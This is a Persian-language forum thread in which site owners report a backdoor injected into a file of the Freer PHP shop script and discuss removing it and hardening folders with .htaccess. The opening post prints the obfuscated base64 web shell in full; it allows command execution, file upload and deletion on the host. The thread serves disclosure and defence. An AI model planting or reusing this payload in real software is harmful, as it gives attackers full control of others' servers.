پاسخ : مشکل جالب در فریرر
نقل قول:
نوشته اصلی توسط
saeid1346
سلام دوستان
از شما تقاضا دارم اخرین نسخه اسکریپت فریر رو از این سایت که به ظاهر معتبره دانلود کنید
http://freer.ir/virtual/download.php
این مسیر رو پیدا کنید
include/libs/smarty/sysplugins/
فایل
smarty_intemplateparser.php رو باز کنید
و اگر صلاح میدونید توضیحی ارائه بدید بابت این کد پایین !!!!
ویرایش شد...
با این که این قضیه گزارش شده بود بهشون ولی هنوز اصلاح نشده و تاریخ اصلاح فایل 9/1/2016 هستش !!!!
هنوزم چند فایل دیگه مثل این داخل اسکریپت هست
البته شاید سایت این بنده خدا هک شده باشه ولی به هر حال یه شخصی داره سو استفاده میکنه.
کد PHP:
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApO3NldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTtzZXNzaW9uX3N0YXJ0KCk7DQokYmxhY2s9JzhmNzU4YmNhZWNmMjkxMDllOGQzMGVhYmJkZGEzOWU2JzsNCmlmKG1kNSgkX1JFUVVFU1RbJ2JsYWNrJ10pPT0kYmxhY2sgb3IgJF9TRVNTSU9OWydsb2dpbiddPT0nMScpew0KJF9TRVNTSU9OWydsb2dpbiddPScxJzsNCmlmKCRfUkVRVUVTVFsnZXZhbCddKXtldmFsKCRfUkVRVUVTVFsnZXZhbCddKTt9aWYoJF9SRVFVRVNUWydkbCddKXt1bmxpbmsoZ2V0Y3dkKCkuRElSRUNUT1JZX1NFUEFSQVRPUi4kX1JFUVVFU1RbJ2RsJ10pO30NCmlmKHN0cnRvbG93ZXIoc3Vic3RyKFBIUF9PUywgMCwgMykpID09ICJ3aW4iKXskcz0iXFwiO31lbHNleyRzPSIvIjt9JGFkPSRfUkVRVUVTVFsnYWQnXTsNCmlmICgkYWQpe2NoZGlyKCRhZCk7fWVsc2V7JGFkPWdldGN3ZCgpO31pZiAoJF9GSUxFU1siZmYiXSl7bW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbImZmIl1bInRtcF9uYW1lIl0sICRfRklMRVNbImZmIl1bIm5hbWUiXSk7fQ0KaWYgKCRociA9IG9wZW5kaXIoJGFkKSkge3doaWxlKCRmID0gcmVhZGRpcigkaHIpKXtpZihpc19kaXIoJGYpKXskZGY9JGRmLiRmLicNCic7fWVsc2V7JGxmPSRsZi4kZi4nDQonO319Y2xvc2VkaXIoJGhyKTt9JGZvcm09Jzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9Z2V0Pic7ZWNobyAnPGNlbnRlcj48dGV4dGFyZWEgY29scz05MCByb3dzPTIwPic7aWYoJF9HRVRbJ2NtZSddKXtwYXNzdGhydSgkX0dFVFsnY21lJ10pO31lbHNle2VjaG8gJGRmLiRsZjt9O2VjaG8nPC90ZXh0YXJlYT4nLiRmb3JtLidDaGFuZ2UgRGlyIDogPGlucHV0IG5hbWU9YWQgc2l6ZT01MCB2YWx1ZT0nLmdldGN3ZCgpLiRzLic+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUdvPjwvZm9ybT4nLiRmb3JtLidDb21tYW5kIEV4ZWN1dGUgOiA8aW5wdXQgbmFtZT1jbWUgc2l6ZT01MCB2YWx1ZT1pZD4gPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPWVYZWN1dGU+PC9mb3JtPjxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+VXBsb2FkIDogPGlucHV0IHNpemU9NTAgdHlwZT1maWxlIG5hbWU9ZmYgPiA8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hZCB2YWx1ZT0nLmdldGN3ZCgpLic+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPVNlbmQ+PC9mb3JtPic7DQp9')); ?>
- - - Updated - - -
http://forum.iranphp.org/Thread-%D9%...-virtual-freer
خدمت شما
از سایت فریر دانلود کردم
فایل smarty_internal_templateparser.php دقیق بررسی کردم
کلمه base64_decode حتی پیدا نشد
پاسخ : مشکل جالب در فریرر
نقل قول:
نوشته اصلی توسط
ata3929
از سایت فریر دانلود کردم
فایل smarty_internal_templateparser.php دقیق بررسی کردم
کلمه base64_decode حتی پیدا نشد
من هم با این روش هک مشابه برخوردکرده ام ولی در خود فایل اصلی موردی نیست؛
دیکد:
http://codepad.org/uLGMnrpc
پاسخ : مشکل جالب در فریرر
هیچیش نیست شما راحت باش فقط یه دسترسی ساده است =))
فقط توصیه میکنم حتما اصلاحش کنید این بخش از فایل رو برای امنیت خودتون ! ;)
- - - Updated - - -
yastheme
همین دیروز فایل اصلاح شده !!! تاریخ تغییر در فایل فشرده ببینید خودتون
به هر حال هاستتون رو بگید حتما اسکن کنن
پست اول ویرایش شد
موفق باشید
پاسخ : مشکل جالب در فریرر
بله فایل شل بود :) من دهنم سرویس شد هرکاری میکردم هاستم اجازه اپلود 1.58 فرییر رو نمیداد ارور شل base64 میزد :)
گشتم دیدم فایل smarty_internal_templateparser.php قسمت آخر هستش و پاک کردم رفع شد
پاسخ : مشکل جالب در فریرر
ظاهرا این یه مشکل جدیه؛ تو سایت های زیادی دیده شده این مشکل !
این نشون دهنده اینه واقعا فریر یک اسکریپت امن دیگه نمی تونه باشه.
زمانی که کاربر در پنل خود فعالیت هایی مثل مشاهده دسته بندی ها یا ساخت دسته بندی جدید دارد یک سری فایل با نام category_20-up.php
در مسیر زیر می سازد:
www.site.com/statics/upload/
این فایل های شل دسترسی کامل به هاست را می دهد؛
با حذف کد هایی که در انتهای فایل smarty_internal_templateparser.php اضافه شدهو جدیدا در سایتهای زیادی دیده می شود مشکل را برطرف کنید، البته مشکل کامل برطرف نمی شود؛
همیشه امکان وجود شل های دیگر است؛
اما این شل ها در پوشه هایی هستند که نیاز به اجرای PHP توسط کاربر در آن آدرس از طریق مرورگر نیست !
یک فایل .htaccess بسازید و کد زیر را در آن قرار دهید:
کد PHP:
<FilesMatch "\.(?i:php)$">
<IfModule !mod_authz_core.c>
Order allow,deny
Deny from all
</IfModule>
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
</FilesMatch>
این فایل .htaccess را در فولدر های زیر قرار دهید:
include
statics
templates
فایل های فولدر plugins و صفحه اصلی را هم بررسی کنید که کد مخربی وجود نداشته باشد ( تعداد فایل ها محدود است و سریع قابل بررسی است )
پاسخ : مشکل جالب در فریرر
نقل قول:
نوشته اصلی توسط
yastheme
ظاهرا این یه مشکل جدیه؛ تو سایت های زیادی دیده شده این مشکل !
این نشون دهنده اینه واقعا فریر یک اسکریپت امن دیگه نمی تونه باشه.
زمانی که کاربر در پنل خود فعالیت هایی مثل مشاهده دسته بندی ها یا ساخت دسته بندی جدید دارد یک سری فایل با نام category_20-up.php
در مسیر زیر می سازد:
www.site.com/statics/upload/
این فایل های شل دسترسی کامل به هاست را می دهد؛
با حذف کد هایی که در انتهای فایل smarty_internal_templateparser.php اضافه شدهو جدیدا در سایتهای زیادی دیده می شود مشکل را برطرف کنید، البته مشکل کامل برطرف نمی شود؛
همیشه امکان وجود شل های دیگر است؛
اما این شل ها در پوشه هایی هستند که نیاز به اجرای PHP توسط کاربر در آن آدرس از طریق مرورگر نیست !
یک فایل .htaccess بسازید و کد زیر را در آن قرار دهید:
کد PHP:
<FilesMatch "\.(?i:php)$">
<IfModule !mod_authz_core.c>
Order allow,deny
Deny from all
</IfModule>
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
</FilesMatch>
این فایل .htaccess را در فولدر های زیر قرار دهید:
include
statics
templates
فایل های فولدر plugins و صفحه اصلی را هم بررسی کنید که کد مخربی وجود نداشته باشد ( تعداد فایل ها محدود است و سریع قابل بررسی است )
ممنون از توضیحات خوبتون
من اون مسیر و که گفته بودم بررسی کردم همچین فایلی ایجاد میشه
و سوالی که دارم دقیقا این کد چه کاری میکنه ؟ ( میشه دقیق توضیح بدین عملکرد این کد )
پاسخ : مشکل جالب در فریرر
نقل قول:
نوشته اصلی توسط
ata3929
ممنون از توضیحات خوبتون
من اون مسیر و که گفته بودم بررسی کردم همچین فایلی ایجاد میشه
و سوالی که دارم دقیقا این کد چه کاری میکنه ؟ ( میشه دقیق توضیح بدین عملکرد این کد )
به هکر ها اجازه آپلود هر گونه فایل مخرب را می دهد،
پاسخ : مشکل جالب در فریرر
نقل قول:
نوشته اصلی توسط
yastheme
ظاهرا این یه مشکل جدیه؛ تو سایت های زیادی دیده شده این مشکل !
این نشون دهنده اینه واقعا فریر یک اسکریپت امن دیگه نمی تونه باشه.
زمانی که کاربر در پنل خود فعالیت هایی مثل مشاهده دسته بندی ها یا ساخت دسته بندی جدید دارد یک سری فایل با نام category_20-up.php
در مسیر زیر می سازد:
www.site.com/statics/upload/
این فایل های شل دسترسی کامل به هاست را می دهد؛
با حذف کد هایی که در انتهای فایل smarty_internal_templateparser.php اضافه شدهو جدیدا در سایتهای زیادی دیده می شود مشکل را برطرف کنید، البته مشکل کامل برطرف نمی شود؛
همیشه امکان وجود شل های دیگر است؛
اما این شل ها در پوشه هایی هستند که نیاز به اجرای PHP توسط کاربر در آن آدرس از طریق مرورگر نیست !
یک فایل .htaccess بسازید و کد زیر را در آن قرار دهید:
کد PHP:
<FilesMatch "\.(?i:php)$">
<IfModule !mod_authz_core.c>
Order allow,deny
Deny from all
</IfModule>
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
</FilesMatch>
این فایل .htaccess را در فولدر های زیر قرار دهید:
include
statics
templates
فایل های فولدر plugins و صفحه اصلی را هم بررسی کنید که کد مخربی وجود نداشته باشد ( تعداد فایل ها محدود است و سریع قابل بررسی است )
مشکل جدیدی نیست .
هکر به هر طریقی به مدیریت دسترسی داشته باشد از قسمت آپلود عکس برای دسته یا محصولات این کار را به سادگی میتواند انجام دهد.
از این موارد گذشته جدیدا در اخباری که از سایت اصلی لود میکند فایل جاوا اسکریپتی لود میشود که به صورت مخفیانه iframe می سازد و احتمالا ***یدن کوکی و ...
پیشنهاد میکنم پیکج امن کننده را استفاده کنید چون باگ های دیگری هم وجود دارد ...
http://www.softiran.org/view-item/97...safe-pack.html
پاسخ : مشکل جالب در فریرر
فایل smarty_internal_templateparser.php برای من تو اون مسیر اصلا وجود نداره!!
- - - Updated - - -
نقل قول:
نوشته اصلی توسط
us12
مشکل جدیدی نیست .
هکر به هر طریقی به مدیریت دسترسی داشته باشد از قسمت آپلود عکس برای دسته یا محصولات این کار را به سادگی میتواند انجام دهد.
از این موارد گذشته جدیدا در اخباری که از سایت اصلی لود میکند فایل جاوا اسکریپتی لود میشود که به صورت مخفیانه iframe می سازد و احتمالا ***یدن کوکی و ...
پیشنهاد میکنم پیکج امن کننده را استفاده کنید چون باگ های دیگری هم وجود دارد ...
http://www.softiran.org/view-item/97...safe-pack.html
راهنمای نصب این پکیج رو هم بگید تو سایت اصلی چیزی ننوشته
